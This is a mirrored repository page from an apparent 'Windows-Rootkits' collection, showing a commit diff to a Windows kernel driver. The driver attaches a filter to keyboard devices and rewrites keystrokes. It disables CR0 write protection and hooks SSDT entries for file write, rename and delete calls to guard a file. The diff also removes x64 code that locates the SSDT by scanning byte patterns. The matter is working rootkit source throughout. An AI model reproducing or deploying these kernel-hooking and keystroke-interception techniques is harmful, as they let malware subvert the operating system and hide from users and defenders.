Mirrors
/
Windows-Rootkits
mirror of https://github.com/ciyze0101/Windows-Rootkits
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

update 

update
This commit is contained in:
LycorisGuard 2018-08-14 21:58:47 +08:00
parent 8080e9d7d3
commit 94f523ced9
4 changed files with 865 additions and 995 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

145
ProtectFilex86/FileProtectX86.c
View File

@ -3,15 +3,11 @@
# include "FileProtectX86.h"
#endif
ULONG gC2pKeyCount = 0;
PDRIVER_OBJECT gDriverObject = NULL;
BOOLEAN bOk = FALSE;
ULONG_PTR IndexOffsetOfFunction = 0;
ULONG_PTR SSDTDescriptor = 0;
KIRQL Irql;
@ -22,15 +18,11 @@ pfnNtSetInformationFile Old_NtSetInformationFileWinXP = NULL;
pfnNtDeleteFile Old_NtDeleteFileWinXP = NULL;
//pfnNtCreateFile Old_NtCreateFileWinXP = NULL;
pfnNtWriteFile Old_NtWriteFileWinXP = NULL;
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
{
ULONG i;
NTSTATUS status;
// 填写所有的分发函数的指针
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
@ -55,14 +47,8 @@ NTSTATUS
// 绑定所有键盘设备
status =c2pAttachDevices(DriverObject, RegisterPath);
#ifdef _WIN64
// SSDTDescriptor = GetKeServiceDescriptorTable64(); //获取SSDT表
// IndexOffsetOfFunction = 4;
#else
SSDTDescriptor = (ULONG_PTR)GetFunctionAddressByNameFromNtosExport(L"KeServiceDescriptorTable");
IndexOffsetOfFunction = 1;
#endif
ulIndex = GetSSDTApiFunctionIndexFromNtdll("NtSetInformationFile");
ulIndex1 = GetSSDTApiFunctionIndexFromNtdll("NtWriteFile");
@ -72,9 +58,7 @@ NTSTATUS
HookWrite(ulIndex1);
HookDelete(ulIndex2);
return STATUS_SUCCESS;
}
@ -357,14 +341,11 @@ NTSTATUS c2pReadComplete(
// 获得这个缓冲区的长度。一般的说返回值有多长都保存在
// Information中。
buf_len = Irp->IoStatus.Information;
numKeys = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
__try
{
if (NT_SUCCESS(IoQueryFileDosDeviceName((PFILE_OBJECT)IrpSp->FileObject, &ObjetNameInfor)))
{
if(wcsstr(ObjetNameInfor->Name.Buffer,L"Shine.txt")!=0)
@ -379,34 +360,27 @@ NTSTATUS c2pReadComplete(
}
//通过EProcess获得进程名称
//ͨ¹ýProcess»ñµÃ½ø³ÌÃû³Æ
for(i = 0; i < numKeys; i++)
{
// DbgPrint("%02X %d\n",pKeyData[i].MakeCode,pKeyData[i].Flags);
if(pKeyData[i].MakeCode == 0x1d&&pKeyData[i].Flags ==KEY_MAKE)
if(pKeyData[i].MakeCode == 0x1d && pKeyData[i].Flags == KEY_MAKE)
{
//左Ctrl
bOk = TRUE;
}
if(pKeyData[i].MakeCode == 0x2e&&pKeyData[i].Flags==KEY_MAKE&&bOk==TRUE) //按下
if(pKeyData[i].MakeCode == 0x2e && pKeyData[i].Flags == KEY_MAKE && bOk == TRUE ) //°´ÏÂ
{
pKeyData[i].MakeCode = 0x20;
bOk = FALSE;
DbgPrint("aaaaaaaaaaaaaa");
}
}
//… 这里可以做进一步的处理。我这里很简单的打印出所有的扫
// 描码。
// for(i=0;i<buf_len;++i)
// {
//DbgPrint("ctrl2cap: %2x\r\n", buf[i]);
@ -463,74 +437,51 @@ NTSTATUS c2pDispatchRead(
return IoCallDriver( devExt->LowerDeviceObject, Irp );
}
VOID HookSSDT(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase = (PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase; //数组首地址
Old_NtSetInformationFileWinXP = (pfnNtSetInformationFile)ServiceTableBase[ulIndex]; //先保存原先的函数地址
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Fake_NtSetInformationFileWinXP; //将KeBugCheckEx函数的偏移地址放入SSDT表中
WPON();
}
VOID HookWrite(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase = (PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase; //数组首地址
Old_NtWriteFileWinXP = (pfnNtWriteFile)ServiceTableBase[ulIndex]; //先保存原先的函数地址
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Fake_NtWriteFileWinXP; //将KeBugCheckEx函数的偏移地址放入SSDT表中
WPON();
}
VOID HookDelete(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase = (PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase; //数组首地址
Old_NtDeleteFileWinXP = (pfnNtDeleteFile)ServiceTableBase[ulIndex]; //先保存原先的函数地址
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Fake_NtDeleteFileWinXP; //将KeBugCheckEx函数的偏移地址放入SSDT表中
WPON();
}
VOID
UnHookSSDT(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase=(PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase;
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Old_NtSetInformationFileWinXP;
WPON();
}
VOID
UnHookSSDTWrite(ULONG_PTR ulIndex)
{
@ -544,25 +495,18 @@ VOID
}
VOID
UnHookSSDTDelete(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase=(PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase;
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Old_NtDeleteFileWinXP;
WPON();
}
NTSTATUS Fake_NtSetInformationFileWinXP(
__in HANDLE FileHandle,
__out PIO_STATUS_BLOCK IoStatusBlock,
@ -582,14 +526,14 @@ NTSTATUS Fake_NtSetInformationFileWinXP(
{
if(wcsstr((ObjetNameInfor->Name).Buffer,L"D:\\Shine.txt"))
{
if(FileInformationClass==FileRenameInformation)
if(FileInformationClass == FileRenameInformation)
{
return;
return STATUS_ACCESS_DENIED;
}
}
}
Old_NtSetInformationFileWinXP(FileHandle,IoStatusBlock,FileInformation,Length,FileInformationClass);
return Old_NtSetInformationFileWinXP(FileHandle,IoStatusBlock,FileInformation,Length,FileInformationClass);
}
NTSTATUS
@ -605,8 +549,6 @@ NTSTATUS
__in_opt PULONG Key
)
{
NTSTATUS Status;
PFILE_OBJECT hObject;
POBJECT_NAME_INFORMATION ObjetNameInfor;
@ -618,11 +560,11 @@ NTSTATUS
{
if(wcsstr((ObjetNameInfor->Name).Buffer,L"D:\\Shine.txt"))
{
return;
return STATUS_ACCESS_DENIED;
}
}
Old_NtWriteFileWinXP(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,Buffer,Length,ByteOffset,Key);
return Old_NtWriteFileWinXP(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,Buffer,Length,ByteOffset,Key);
}
@ -632,10 +574,9 @@ NTSTATUS Fake_NtDeleteFileWinXP(
{
if(wcsstr((ObjectAttributes->ObjectName)->Buffer,L"D:\\Shine.txt"))
{
return;
return STATUS_ACCESS_DENIED;
}
Old_NtDeleteFileWinXP(ObjectAttributes);
return Old_NtDeleteFileWinXP(ObjectAttributes);
}
@ -655,36 +596,6 @@ PVOID
return FunctionAddress;
}
PVOID GetKeServiceDescriptorTable64()
{
PUCHAR StartSearchAddress = (PUCHAR)__readmsr(0xC0000082);
PUCHAR EndSearchAddress = StartSearchAddress + 0x500;
PUCHAR i = NULL;
UCHAR b1=0,b2=0,b3=0;
ULONG_PTR ulv1 = 0;
PVOID FunctionAddress = 0;
for(i=StartSearchAddress;i<EndSearchAddress;i++)
{
if( MmIsAddressValid(i) && MmIsAddressValid(i+1) && MmIsAddressValid(i+2) )
{
b1=*i;
b2=*(i+1);
b3=*(i+2);
if( b1==0x4c && b2==0x8d && b3==0x15 )
{
memcpy(&ulv1,i+3,4);
FunctionAddress = (ULONG_PTR)ulv1 + (ULONG_PTR)i + 7;
return FunctionAddress;
}
}
}
return 0;
}
LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName)
{
@ -705,9 +616,7 @@ LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName)
Status = MapFileInUserSpace(wzNtdll, NtCurrentProcess(), &MapBase, &ViewSize);
if (!NT_SUCCESS(Status))
{
return STATUS_UNSUCCESSFUL;
}
else
{
@ -745,10 +654,6 @@ LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName)
return ulIndex;
}
NTSTATUS
MapFileInUserSpace(WCHAR* wzFilePath,IN HANDLE hProcess OPTIONAL,
OUT PVOID *BaseAddress,
@ -808,7 +713,6 @@ NTSTATUS
if (!NT_SUCCESS(Status))
{
return Status;
}
if (!hProcess){
@ -835,10 +739,6 @@ NTSTATUS
return Status;
}
ULONG_PTR GetFunctionAddressByIndexFromSSDT32(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor)
{
ULONG_PTR ServiceTableBase= 0 ;
@ -849,23 +749,6 @@ ULONG_PTR GetFunctionAddressByIndexFromSSDT32(ULONG_PTR ulIndex,ULONG_PTR SSDTDe
return (*(PULONG_PTR)(ServiceTableBase + 4 * ulIndex));
}
ULONG_PTR GetFunctionAddressByIndexFromSSDT64(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor)
{
LONG ulv1 = 0;
ULONG_PTR ulv2 = 0;
ULONG_PTR ServiceTableBase= 0 ;
PSYSTEM_SERVICE_TABLE64 SSDT = (PSYSTEM_SERVICE_TABLE64)SSDTDescriptor;
ServiceTableBase=(ULONG_PTR)(SSDT ->ServiceTableBase);
ulv2 = ServiceTableBase + 4 * ulIndex;
ulv1 = *(PLONG)ulv2;
ulv1 = ulv1>>4;
return ServiceTableBase + (ULONG_PTR)ulv1;
}
VOID WPOFF()
{
ULONG_PTR cr0 = 0;
@ -873,16 +756,14 @@ VOID WPOFF()
cr0 =__readcr0();
cr0 &= 0xfffffffffffeffff;
__writecr0(cr0);
// _disable(); //这句话 屏蔽也没有啥
//_disable();
}
VOID WPON()
{
ULONG_PTR cr0=__readcr0();
cr0 |= 0x10000;
// _enable(); //这句话 屏蔽也没有啥
//_enable();
__writecr0(cr0);
KeLowerIrql(Irql);
}

11
ProtectFilex86/FileProtectX86.h
View File

@ -15,14 +15,6 @@ NTSTATUS
#define SEC_IMAGE 0x01000000
typedef struct _SYSTEM_SERVICE_TABLE64{
PVOID ServiceTableBase;
PVOID ServiceCounterTableBase;
ULONG64 NumberOfServices;
PVOID ParamTableBase;
} SYSTEM_SERVICE_TABLE64, *PSYSTEM_SERVICE_TABLE64;
typedef struct _SYSTEM_SERVICE_TABLE32 {
PVOID ServiceTableBase;
PVOID ServiceCounterTableBase;
@ -147,9 +139,6 @@ NTSYSAPI
RtlImageNtHeader(PVOID Base);
PVOID GetFunctionAddressByNameFromSSDT(CHAR* szFunctionName,ULONG_PTR SSDTDescriptor);
ULONG_PTR GetFunctionAddressByIndexFromSSDT64(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor);
PVOID GetKeServiceDescriptorTable64();
ULONG_PTR GetFunctionAddressByIndexFromSSDT32(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor);
PVOID
GetFunctionAddressByNameFromNtosExport(WCHAR *wzFunctionName);